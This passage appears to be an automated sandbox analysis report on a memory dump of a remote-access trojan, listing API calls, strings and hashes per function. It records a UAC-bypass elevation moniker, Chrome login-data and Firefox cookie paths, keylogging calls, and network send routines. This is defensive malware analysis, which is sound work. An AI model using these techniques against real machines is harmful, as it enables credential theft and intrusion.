                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                                  • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                                  • API String ID: 3756808967-1743721670
                                                  • Opcode ID: 1d3c19fb237022e801d10a57cb3e4ad5faa3765b37f293df49325fb65a29b400
                                                  • Instruction ID: 73d50abc618c2a3d6a57d9d5b79267519347fdb4c989691d2635b3abfd1995a7
                                                  • Opcode Fuzzy Hash: 1d3c19fb237022e801d10a57cb3e4ad5faa3765b37f293df49325fb65a29b400
                                                  • Instruction Fuzzy Hash: B5712E705083419AC724FB21D8959AEB7E4AF90348F40483FF586631E3EF79994DCB9A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0$1$2$3$4$5$6$7$VG
                                                  • API String ID: 0-1861860590
                                                  • Opcode ID: e6a777f80bf8230cc7af5635f6fa1f38021a03d05ab0836674c6e7259f08b149
                                                  • Instruction ID: 7133b754bba813e7b371628f59950815dc208a5c28e1558ec9b3f3725e93ffbd
                                                  • Opcode Fuzzy Hash: e6a777f80bf8230cc7af5635f6fa1f38021a03d05ab0836674c6e7259f08b149
                                                  • Instruction Fuzzy Hash: 9171E2709183019FD704EF21D862BAB7B94DF85710F00492FF5A26B2D1DE78AB49CB96
                                                  APIs
                                                  • _wcslen.LIBCMT ref: 0040755C
                                                  • CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Object_wcslen
                                                  • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                  • API String ID: 240030777-3166923314
                                                  • Opcode ID: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
                                                  • Instruction ID: 28daeeabb8f9d0779e909056d36d27ae9c6096be3406941992b1a3e854751cf1
                                                  • Opcode Fuzzy Hash: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
                                                  • Instruction Fuzzy Hash: 88113771D04214B6D710EA959845BDEB77C9B08714F15006FF904B2281EB7CAE448A6F
                                                  APIs
                                                  • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A7EF
                                                  • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A83E
                                                  • GetLastError.KERNEL32 ref: 0041A84C
                                                  • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A884
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                  • String ID:
                                                  • API String ID: 3587775597-0
                                                  • Opcode ID: 4accfa2daad176f8b5f28278118318dfa0062abe9eed3b7a7428a28b758f59c5
                                                  • Instruction ID: 52116c85fb856a5ac6c14b0259405ec20ae2fa8d9cc538ef9907a440d1633313
                                                  • Opcode Fuzzy Hash: 4accfa2daad176f8b5f28278118318dfa0062abe9eed3b7a7428a28b758f59c5
                                                  • Instruction Fuzzy Hash: 17817071104301ABC304EF61D885DAFB7A8FF94749F50082EF185521A2EF78EE49CB9A
                                                  APIs
                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                  • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045279C
                                                  • IsValidCodePage.KERNEL32(00000000), ref: 004527F7
                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 00452806
                                                  • GetLocaleInfoW.KERNEL32(?,00001001,JD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0045284E
                                                  • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 0045286D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                  • String ID: JD$JD$JD
                                                  • API String ID: 745075371-3517165026
                                                  • Opcode ID: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                                  • Instruction ID: 3c84011e7dbdf7a6f9673bc5a23f9f2f22d5020eb6794df094384b3d0215d6fb
                                                  • Opcode Fuzzy Hash: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                                  • Instruction Fuzzy Hash: 9B518571900205ABDB10DFA5CD45ABF77B8EF0A702F04046BED14E7292E7B89948CB69
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C3D6
                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 0040C4A9
                                                  • FindClose.KERNEL32(00000000), ref: 0040C4B8
                                                  • FindClose.KERNEL32(00000000), ref: 0040C4E3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$CloseFile$FirstNext
                                                  • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                  • API String ID: 1164774033-405221262
                                                  • Opcode ID: e90d06a8ec93e69e400289d3d5a4f788ee45a56a67685538a4b9ff5dd8d84a81
                                                  • Instruction ID: 33618048715e6b2d4a7b39963b1e19558724686ef99070a322097c87c0ca4c0c
                                                  • Opcode Fuzzy Hash: e90d06a8ec93e69e400289d3d5a4f788ee45a56a67685538a4b9ff5dd8d84a81
                                                  • Instruction Fuzzy Hash: 59313E31500219AACB14E761DC9A9EE7778AF50719F10057FF106B21E2EF7C9946CA4D
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C37D
                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3AD
                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C41F
                                                  • DeleteFileW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C42C
                                                    • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C402
                                                  • GetLastError.KERNEL32(?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C44D
                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C463
                                                  • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C46A
                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C473
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                  • String ID:
                                                  • API String ID: 2341273852-0
                                                  • Opcode ID: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                                                  • Instruction ID: 53b23dfad01ba0d5beec27b7c27070a1caf437d6ccbc5233b8522822963bc02e
                                                  • Opcode Fuzzy Hash: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                                                  • Instruction Fuzzy Hash: 4A31807284431CAADB24E761DC89EEB736CAF09305F0405FBF559D2051EB3DDAC98A58
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(00000000,?), ref: 00419DDC
                                                  • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419EA8
                                                    • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$Find$CreateFirstNext
                                                  • String ID: 8SG$PXG$PXG$NG$PG
                                                  • API String ID: 341183262-3812160132
                                                  • Opcode ID: 237d1f22ecb36930833d32adaf0f8150011d450d8f3db5627c223a0958ca531b
                                                  • Instruction ID: 0eaaaed992bec346a468a6d62c1d6888972f0568f5be94e2eef244f320132bd5
                                                  • Opcode Fuzzy Hash: 237d1f22ecb36930833d32adaf0f8150011d450d8f3db5627c223a0958ca531b
                                                  • Instruction Fuzzy Hash: 998151315083415BC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                                                  APIs
                                                  • GetForegroundWindow.USER32(?,?,004750F0), ref: 0040A451
                                                  • GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                                                  • GetKeyboardLayout.USER32(00000000), ref: 0040A464
                                                  • GetKeyState.USER32(00000010), ref: 0040A46E
                                                  • GetKeyboardState.USER32(?,?,004750F0), ref: 0040A479
                                                  • ToUnicodeEx.USER32(00475144,?,?,?,00000010,00000000,00000000), ref: 0040A49C
                                                  • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4FC
                                                  • ToUnicodeEx.USER32(00475144,?,?,?,00000010,00000000,00000000), ref: 0040A535
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                  • String ID:
                                                  • API String ID: 1888522110-0
                                                  • Opcode ID: 1fbef96bbf5188aadc2f193688702ae07512c2e2bc484e71aa5862d9cec23228
                                                  • Instruction ID: fd17a64e9e4f7f825196359ceba3421c6f582a70c0a4c9d277f8a97da3dc7bda
                                                  • Opcode Fuzzy Hash: 1fbef96bbf5188aadc2f193688702ae07512c2e2bc484e71aa5862d9cec23228
                                                  • Instruction Fuzzy Hash: 1E316D72504308BFD700DF90DC45F9B7BECBB88744F00083AB645D61A0D7B5E9498BA6
                                                  APIs
                                                  • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140D8
                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140E4
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                  • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004142A5
                                                  • GetProcAddress.KERNEL32(00000000), ref: 004142AC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressCloseCreateLibraryLoadProcsend
                                                  • String ID: SHDeleteKeyW$Shlwapi.dll
                                                  • API String ID: 2127411465-314212984
                                                  • Opcode ID: 792224e8d8875d188e8c1e1e77587fb07dfbed7257eee764e61defc228250225
                                                  • Instruction ID: 51cedef5a77654bf04fe1bae55708f30d4330cefe0c145b830acf249c6506b6e
                                                  • Opcode Fuzzy Hash: 792224e8d8875d188e8c1e1e77587fb07dfbed7257eee764e61defc228250225
                                                  • Instruction Fuzzy Hash: 16B1F671A0430066CA14FB76DC579AF36A85F91788F40053FB906771E2EE7D8A48C6DA
                                                  APIs
                                                  • _free.LIBCMT ref: 00449292
                                                  • _free.LIBCMT ref: 004492B6
                                                  • _free.LIBCMT ref: 0044943D
                                                  • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                                  • _free.LIBCMT ref: 00449609
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                  • String ID:
                                                  • API String ID: 314583886-0
                                                  • Opcode ID: 559000fade000ce5825261073cc708c78a0cec13cca3e850b0f4d44e63821d59
                                                  • Instruction ID: 020e1479f4dc59d8c1013f8997fe2690be381d41ecad25fd3e4808fcef6bdafa
                                                  • Opcode Fuzzy Hash: 559000fade000ce5825261073cc708c78a0cec13cca3e850b0f4d44e63821d59
                                                  • Instruction Fuzzy Hash: E0C13A71900205ABFB24DF79CD41AAF7BA8EF46314F2405AFE884D7291E7788D42D758
                                                  APIs
                                                    • Part of subcall function 0041798D: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                    • Part of subcall function 0041798D: OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                    • Part of subcall function 0041798D: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                    • Part of subcall function 0041798D: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                    • Part of subcall function 0041798D: GetLastError.KERNEL32 ref: 004179D8
                                                  • ExitWindowsEx.USER32(00000000,00000001), ref: 00416891
                                                  • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 004168A6
                                                  • GetProcAddress.KERNEL32(00000000), ref: 004168AD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                  • String ID: !D@$PowrProf.dll$SetSuspendState
                                                  • API String ID: 1589313981-2876530381
                                                  • Opcode ID: 4bd10a5f799b95ac4237c352870c0353e076f464d26d690b152e3588c70e8aba
                                                  • Instruction ID: 272f3f60014ab8f8f2fa2781f50e1ac7d9ab3f628c5d0f86ef79d7992e461550
                                                  • Opcode Fuzzy Hash: 4bd10a5f799b95ac4237c352870c0353e076f464d26d690b152e3588c70e8aba
                                                  • Instruction Fuzzy Hash: D821B17060430166CA14FBB28856ABF36599F41388F41087FB501671D2EF3DD845C76E
                                                  APIs
                                                  • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA89
                                                  • GetLastError.KERNEL32 ref: 0040BA93
                                                  Strings
                                                  • [Chrome StoredLogins found, cleared!], xrefs: 0040BAB9
                                                  • [Chrome StoredLogins not found], xrefs: 0040BAAD
                                                  • UserProfile, xrefs: 0040BA59
                                                  • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA54
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DeleteErrorFileLast
                                                  • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                  • API String ID: 2018770650-1062637481
                                                  • Opcode ID: 0e12c434a704d568d93f0e9ae73d02a011f2f49309dc381e150468c0f0ecafbd
                                                  • Instruction ID: 0532e36a1aab116e50a9f1d1704ee325f44086adb43c50cfffb7bf5285f9a594
                                                  • Opcode Fuzzy Hash: 0e12c434a704d568d93f0e9ae73d02a011f2f49309dc381e150468c0f0ecafbd
                                                  • Instruction Fuzzy Hash: 76018F61A402056ACB04B7B6DC5B9BE7724A921704B50057FF806722D2FE7D49098BDE
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                  • GetLastError.KERNEL32 ref: 004179D8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                  • String ID: SeShutdownPrivilege
                                                  • API String ID: 3534403312-3733053543
                                                  • Opcode ID: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                                  • Instruction ID: 35ac2027e355ce869dd6e937a138cd84cb59798e299a7bc9dfe05b1c572390d3
                                                  • Opcode Fuzzy Hash: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                                  • Instruction Fuzzy Hash: 38F03A71802229FBDB10ABA1EC4DAEF7FBCEF05612F100465B909A1152D7348E04CBB5
                                                  APIs
                                                  • __EH_prolog.LIBCMT ref: 00409293
                                                    • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040932F
                                                  • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040938D
                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 004093E5
                                                  • FindClose.KERNEL32(00000000), ref: 004093FC
                                                    • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                    • Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                    • Part of subcall function 00404E26: CloseHandle.KERNELBASE(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E4C
                                                  • FindClose.KERNEL32(00000000), ref: 004095F4
                                                    • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                    • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                                  • String ID:
                                                  • API String ID: 1824512719-0
                                                  • Opcode ID: 7f710e3f43e84a46c7d58e8ffede0b85df0d6954aa1109bf9368635132fc8e8d
                                                  • Instruction ID: 89df7f8b75d3b77417eb58d09b4f39b7dfb13bde992cfd9524fc7595df83f5be
                                                  • Opcode Fuzzy Hash: 7f710e3f43e84a46c7d58e8ffede0b85df0d6954aa1109bf9368635132fc8e8d
                                                  • Instruction Fuzzy Hash: 34B19D32900109AACB14EBA1DD92AEDB379AF44314F50417FF506B60E2EF785F49CB59
                                                  APIs
                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A731,00000000), ref: 0041AAE4
                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A731,00000000), ref: 0041AAF9
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB06
                                                  • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A731,00000000), ref: 0041AB11
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB23
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB26
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Service$CloseHandle$Open$ManagerStart
                                                  • String ID:
                                                  • API String ID: 276877138-0
                                                  • Opcode ID: e30b05f20183ba3613960b636cce26fc80956d1a3587d8fe59d4f8762fcd24c9
                                                  • Instruction ID: 14dbf03deabb1432b93a26d2ddf90514dbbc411f15d31c7908333a88c2a5d316
                                                  • Opcode Fuzzy Hash: e30b05f20183ba3613960b636cce26fc80956d1a3587d8fe59d4f8762fcd24c9
                                                  • Instruction Fuzzy Hash: FEF0E971141225AFD2115B209C88DFF276CDF85B66B00082AF901921919B68CC45E579
                                                  APIs
                                                  • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 00452555
                                                  • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 0045257E
                                                  • GetACP.KERNEL32(?,?,004527DB,?,00000000), ref: 00452593
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InfoLocale
                                                  • String ID: ACP$OCP
                                                  • API String ID: 2299586839-711371036
                                                  • Opcode ID: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                                  • Instruction ID: 097c3b5166b2d36aca1cb621bb06e922528e2ea4561953c90108b9915aa2a338
                                                  • Opcode Fuzzy Hash: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                                  • Instruction Fuzzy Hash: 7E21F932600108B6D734CF14CA10A9B73A6EB16B53B564467ED09D7312F7B6DD44C398
                                                  APIs
                                                  • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041B54A
                                                  • LoadResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B55E
                                                  • LockResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B565
                                                  • SizeofResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B574
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Resource$FindLoadLockSizeof
                                                  • String ID: SETTINGS
                                                  • API String ID: 3473537107-594951305
                                                  • Opcode ID: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                                                  • Instruction ID: d04f7a3eece584ab18b37ce022e38df3785cd6d6757b7dd0dc659012c7d5cbc3
                                                  • Opcode Fuzzy Hash: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                                                  • Instruction Fuzzy Hash: 8EE01A76600B22EBEB211BB1AC4CD863E29F7C97637140075F90586231CB798840DA98
                                                  APIs
                                                  • __EH_prolog.LIBCMT ref: 004096A5
                                                  • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040971D
                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00409746
                                                  • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040975D
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$File$CloseFirstH_prologNext
                                                  • String ID:
                                                  • API String ID: 1157919129-0
                                                  • Opcode ID: 0d49facb4c961c1d24951fc59c90081d0cce9a74728756e4b862b6de7d5b089e
                                                  • Instruction ID: 8e52766585a78a9bd0f7e398a9017c7fe376444e683812dd136b20495b515571
                                                  • Opcode Fuzzy Hash: 0d49facb4c961c1d24951fc59c90081d0cce9a74728756e4b862b6de7d5b089e
                                                  • Instruction Fuzzy Hash: 7F814C328001099BCB15EBA2DC969EDB378AF14318F10417FE506B71E2EF789E49CB58
                                                  APIs
                                                  • __EH_prolog.LIBCMT ref: 0040884C
                                                  • FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A50
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                                  • String ID:
                                                  • API String ID: 1771804793-0
                                                  • Opcode ID: 2aff72510e3da79c4ec0127435383929a3d65dfb18998d25a11cc0f49d42b15d
                                                  • Instruction ID: 0d5560aa06bbfb8d15084ed76e809f646cede1ce68103026aeaac9ba950e1e68
                                                  • Opcode Fuzzy Hash: 2aff72510e3da79c4ec0127435383929a3d65dfb18998d25a11cc0f49d42b15d
                                                  • Instruction Fuzzy Hash: 9D517F72900209AACB04FB65DD569ED7778AF10308F50417FB906B71E2EF389B49CB89
                                                  APIs
                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FF7
